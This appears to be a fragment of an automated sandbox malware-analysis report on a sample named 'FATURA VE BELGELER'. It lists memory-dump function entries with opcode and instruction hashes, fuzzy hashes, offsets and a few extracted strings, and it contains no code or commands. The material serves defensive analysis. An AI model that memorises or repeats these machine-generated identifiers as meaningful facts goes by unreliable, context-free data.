                                                              • Opcode ID: 7c31345d08cba31ca72190affd3e22db5f0359ff762ebdf06b8d77ae7bb5a1fc
                                                              • Instruction ID: 8c75dbec98fc8a8dfa58887a814795b47f78addd9004b58fa97a7eccdfea023d
                                                              • Opcode Fuzzy Hash: 7c31345d08cba31ca72190affd3e22db5f0359ff762ebdf06b8d77ae7bb5a1fc
                                                              • Instruction Fuzzy Hash: 4321F23D7006128FD71A9A25D49852AB7AAFFC56557044569E80ACB3D1CF38DC07C7D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4eb737c159df179e2cf2832690ec0895ab06a287c6aaf6030eee9feedce63347
                                                              • Instruction ID: e3c856fc33c2df38273d62aa27437c0d4fe9bb1237dd416a898343db8e402d64
                                                              • Opcode Fuzzy Hash: 4eb737c159df179e2cf2832690ec0895ab06a287c6aaf6030eee9feedce63347
                                                              • Instruction Fuzzy Hash: 5521C739A001569FCB14DF64C840AAF3779EB89254B10C019ED0DD7384DB31FA0ACBC2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443373650.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d7d000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 162613ce658aece7765ce1884d2f0b542291a7098cf1ce25ce53edd21ea25779
                                                              • Instruction ID: ca7a4c661358a7644af994a087d942e2443a35d14a3ee1a7a31bd336cc3bc83e
                                                              • Opcode Fuzzy Hash: 162613ce658aece7765ce1884d2f0b542291a7098cf1ce25ce53edd21ea25779
                                                              • Instruction Fuzzy Hash: 6D212F72500204EFCB05DF14C9C0B26BF76FF98328F24C169E90D0A256D33AE806CAB2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443723684.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_edd000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 03a76e35243398d2449659cd7df44e67550b9f447b00822d080dd23ab44169d4
                                                              • Instruction ID: 303f6170de2e665ca24fae81f7ba3b2dc911d5dce18a75213d5a43f455676bdd
                                                              • Opcode Fuzzy Hash: 03a76e35243398d2449659cd7df44e67550b9f447b00822d080dd23ab44169d4
                                                              • Instruction Fuzzy Hash: 44210471508204EFCB14CF24CDC4B26BB66FB84318F24C56EE9495B392C73AD847DA62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9db9fda2e307f901d35b9acbeba9ae44eeae76a545d353feddfd836586b3bbe2
                                                              • Instruction ID: 1128d0c6b3bd8c509d39719f2ac9f858adb0a21ea1984221b5c07f7e61dac21a
                                                              • Opcode Fuzzy Hash: 9db9fda2e307f901d35b9acbeba9ae44eeae76a545d353feddfd836586b3bbe2
                                                              • Instruction Fuzzy Hash: 1321F07D6441099FDB1A9F64D444B6B3BA6EB88324F004429F909CB285CB35CD6ACBE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49e24ed06b130d86e6ebdaef824503d3ac39b638d94c6b147c3b6eafc3ad11be
                                                              • Instruction ID: 127c72f116d1621359867b0c5997d4d4537e01896a39ca6d1b55f5ca99964b26
                                                              • Opcode Fuzzy Hash: 49e24ed06b130d86e6ebdaef824503d3ac39b638d94c6b147c3b6eafc3ad11be
                                                              • Instruction Fuzzy Hash: 4611E2367082945FDF466F7898646AF3FB6EFC5210B40446AE905CB3D2CE348E0693A6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30eabb117b8d43e3e925c3659990fef7f6a4ae279b5a45ec342ec52bd6a9caba
                                                              • Instruction ID: c013001122478ec9b4c4dff3bec65f6639d0e8183f8ef3293d73b3737519e6be
                                                              • Opcode Fuzzy Hash: 30eabb117b8d43e3e925c3659990fef7f6a4ae279b5a45ec342ec52bd6a9caba
                                                              • Instruction Fuzzy Hash: 162192B4D011099FDB45EFA9D5406CEBFF2EF85300F14C5AAD018A7266E7754A0ACB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fc2b88b274732edfb545f887145c0babbe38ee6e94e0f0d38cd9cbc04d137595
                                                              • Instruction ID: 5387323ded80bc948430be4e62ccb5eacd065b4c2d777ea2d3ecf9c0637cd051
                                                              • Opcode Fuzzy Hash: fc2b88b274732edfb545f887145c0babbe38ee6e94e0f0d38cd9cbc04d137595
                                                              • Instruction Fuzzy Hash: 5D11043D7006128FD7199A2AD89892EB7AAFFC46653550479E80ADB3D0CF38DC02C7D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443373650.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d7d000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction ID: 5a7e291d9e19d34d2b4b828b662aada9af42930fb786262347460f55e56749d1
                                                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction Fuzzy Hash: 6811D376504280DFCB16CF10D5C4B16BF72FF94328F28C5A9D9490B656C33AE85ACBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 68bbfc7499f2ac53a9990e120c823da9ea7cd595c55d987cc3689699f7896dfb
                                                              • Instruction ID: cb05beb770989e510d4851986159fb362fcc016d442ecbe153cb5f95b1615661
                                                              • Opcode Fuzzy Hash: 68bbfc7499f2ac53a9990e120c823da9ea7cd595c55d987cc3689699f7896dfb
                                                              • Instruction Fuzzy Hash: FF01D67AE101119FCB50EF78D50499A7BFDFF482657000565E809DB311DB30CE128BE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54d5e386bbbfefee0abac6b6624ec27ebc5f2a1bac061b52dd42fa59b7ce5d8b
                                                              • Instruction ID: fe5658f58856f896dd7a0f55a2107423b26dd434b75769063c0c5585ddd84045
                                                              • Opcode Fuzzy Hash: 54d5e386bbbfefee0abac6b6624ec27ebc5f2a1bac061b52dd42fa59b7ce5d8b
                                                              • Instruction Fuzzy Hash: 5311E834E001498FEF00DFF8D850BEEBBB5AF49315F449565E90CA7385E6309E428B61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f5316347aeee067d9b89c6691eb500fd304d3323fc6a9aa9f868bb8a4c43345a
                                                              • Instruction ID: 1a134b08cb4e3682ac5362bd7758df01e612d2a184cb1d476433e9420c42ac06
                                                              • Opcode Fuzzy Hash: f5316347aeee067d9b89c6691eb500fd304d3323fc6a9aa9f868bb8a4c43345a
                                                              • Instruction Fuzzy Hash: 4D117274D01109DFCB45EFA9E54068EBBF5FF84300F10C569D018A7365E7749A0ACB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443723684.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_edd000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction ID: fbb69536e715096ea24e9a04151aefc5368bd03f7c504a59f38dd10f238b9050
                                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction Fuzzy Hash: 2111BE75508244CFCB11CF10C9C4B16BB62FB84318F24C6AAD8494B392C33AD84BCB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: de2b0893b71b88823c579b3ced2eef0863a7f7074827bfdf0c0d21e60cf06b45
                                                              • Instruction ID: 291318c3526bbcea23567772ee2578a687d04a9ce9712f53e5eff7ff2003667e
                                                              • Opcode Fuzzy Hash: de2b0893b71b88823c579b3ced2eef0863a7f7074827bfdf0c0d21e60cf06b45
                                                              • Instruction Fuzzy Hash: 110128BAB041146FCB068E6898146EF3BABDBC8351B14842AF908C72D1DA758D1297E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 45b93953bb5408d1e56236e3267b6bafd58ba164493d87ae1fcf04f9f93b6b7e
                                                              • Instruction ID: 4b5f2dafcd6ed91850cac0169307febce2f00117031a6b3bbb72984bb842261b
                                                              • Opcode Fuzzy Hash: 45b93953bb5408d1e56236e3267b6bafd58ba164493d87ae1fcf04f9f93b6b7e
                                                              • Instruction Fuzzy Hash: 7701FB75E102199FCF54EFB9C8106AEBBF9BF88200F10852AD819E7250E7385912CFE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 31ce2aa60e0a0d6e6b21d8166bb3308f110915ddb7b0e5dbc1578538b6d4fd3a
                                                              • Instruction ID: c2e92a07ebcf4bbac88c102838aeeb6b5d49c11fd2b8f28ddbf73f01375fdbd9
                                                              • Opcode Fuzzy Hash: 31ce2aa60e0a0d6e6b21d8166bb3308f110915ddb7b0e5dbc1578538b6d4fd3a
                                                              • Instruction Fuzzy Hash: 8BE02B38819149CFEB04AB97A8451F9B775E797381FC96025D404F24A6C77A451FCA11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b30650e4876608321955d81ecb489875cded21fef90ccf5afa7fd4758abcca39
                                                              • Instruction ID: ec3db86c4ac626f3555269f4982762eb8ffa07af3a2d0e499d3b1f0f1af1fc16
                                                              • Opcode Fuzzy Hash: b30650e4876608321955d81ecb489875cded21fef90ccf5afa7fd4758abcca39
                                                              • Instruction Fuzzy Hash: CFF03A79A10125CFCB94EF7CC40465E7BF4AF0C21471145A9D409DB360EB30DA00CBD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e6d839483c7d224f2ed026d80515c081df79379cfe3ed98ec9fa23f3ae1a77e
                                                              • Instruction ID: 35a3cad8c28a744e1120c0531311d4b3fb80fa47d8cfce53639916c676732461
                                                              • Opcode Fuzzy Hash: 6e6d839483c7d224f2ed026d80515c081df79379cfe3ed98ec9fa23f3ae1a77e
                                                              • Instruction Fuzzy Hash: 09E0D831D612968ACB21D7B4D8444DEBF34EE9122074143B7D0147B945EB74164BC3A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65708c3e5f7fe39084d6ac674921a0429e44ec702f52b6321c4519f7ba0e4bf4
                                                              • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                                              • Opcode Fuzzy Hash: 65708c3e5f7fe39084d6ac674921a0429e44ec702f52b6321c4519f7ba0e4bf4
                                                              • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                              • Instruction ID: 2a3123119d6586e7eccb6dee4973e7e32173fb55afba3bd542e709547aeb75f1
                                                              • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                              • Instruction Fuzzy Hash: 68C0127B10C5282AA225504E7C41AA3AA4CC2C12B4A250137F91CD324158425C4041A4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c70d525b952bd9b5ed087069f7f6e50636e2f638285e107f122b24c7ce89e361
                                                              • Instruction ID: 9f4b93a4b50b2a660bbf06b268189b965c5d10e18f4309510bc189966898d11a
                                                              • Opcode Fuzzy Hash: c70d525b952bd9b5ed087069f7f6e50636e2f638285e107f122b24c7ce89e361
                                                              • Instruction Fuzzy Hash: 69D0677BB410189FCF049F98E8408DDBBB6FB9C221B048516E915E3261C6319921DB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c12252bb5950a92549353867f5b636653a992758806aaaf6cc12bc2dec6457dc
                                                              • Instruction ID: a52db824c929e52b376d85a6348f648b49b60272ea861d8b4d9ca7819312f8dc
                                                              • Opcode Fuzzy Hash: c12252bb5950a92549353867f5b636653a992758806aaaf6cc12bc2dec6457dc
                                                              • Instruction Fuzzy Hash: EFD05B749483864FC74AFF30F5158143B39FFC1308B9049A5E8190A55AFB7E4E4AC7A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 29c926916a9d551ff3fd6c92890dd3e1f4d0afba0883a72b8ab2c3f8cefe8970
                                                              • Instruction ID: c6f153bf9e4ab0225efa001a96c1395131623e9954e16274578fed16615a0e5f
                                                              • Opcode Fuzzy Hash: 29c926916a9d551ff3fd6c92890dd3e1f4d0afba0883a72b8ab2c3f8cefe8970
                                                              • Instruction Fuzzy Hash: 94C012345443494BC64DFB75FA45D55371EEAC0304F908D20B40A0612DEF7A594A86A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xaq$Xaq$Xaq$Xaq
                                                              • API String ID: 0-4015495023
                                                              • Opcode ID: e14477604d0a9b088dd50cf49a33660c63da51751cc90990409c48db4b727e01
                                                              • Instruction ID: 3c7f1ec5a001d00078104b8bf1e5821d3352e1d4d2c5abeabe00ac547732f145
                                                              • Opcode Fuzzy Hash: e14477604d0a9b088dd50cf49a33660c63da51751cc90990409c48db4b727e01
                                                              • Instruction Fuzzy Hash: 8491A67EE0032A8BCB564FB4C95439AB7B9FF65310F0548E4C90AD62DADB704E99CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xaq$Xaq$Xaq$Xaq
                                                              • API String ID: 0-4015495023
                                                              • Opcode ID: 1a1492155d4786426998cff19fdd354410e6e0ef4a8df6f4d2725b643ded0d3c
                                                              • Instruction ID: 217bddd65b10466b95041d229cb74379fa251a04e37f03e42386bbc1e4542c32
                                                              • Opcode Fuzzy Hash: 1a1492155d4786426998cff19fdd354410e6e0ef4a8df6f4d2725b643ded0d3c
                                                              • Instruction Fuzzy Hash: 6941F935E4011A8BDFB8CA69C94077EB6ADAF84310F110175CD26E7381EA71DD82DBE2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xaq$Xaq$Xaq$Xaq
                                                              • API String ID: 0-4015495023
                                                              • Opcode ID: fc6ddff92d7e7baee7e817b0466a2434e94db7232d5e5ec91fec2330f2f6c831
                                                              • Instruction ID: cc3e65cf31fb6535b4d4a7187fc7a91ae5a43f047c294a248a5284a2d704777d
                                                              • Opcode Fuzzy Hash: fc6ddff92d7e7baee7e817b0466a2434e94db7232d5e5ec91fec2330f2f6c831
                                                              • Instruction Fuzzy Hash: 74319635E4011B4BDF78CA69C94077FA6AAAF94300F150075CD1AE7785EA31DD82DFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \;]q$\;]q$\;]q$\;]q
                                                              • API String ID: 0-2351511683
                                                              • Opcode ID: 340ac1638823cc6ec74853ac921987fb2901bf9c9bd0960e91150867b4139c87
                                                              • Instruction ID: 60b7f3a9f2259c906312c3e09553d17ea0473f8a3549e9b062d978d910a3febb
                                                              • Opcode Fuzzy Hash: 340ac1638823cc6ec74853ac921987fb2901bf9c9bd0960e91150867b4139c87
                                                              • Instruction Fuzzy Hash: 1801843DB401298FCB649E2DC490A2577EFBF89A647254569E48ACB3F2EB31DC41C790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%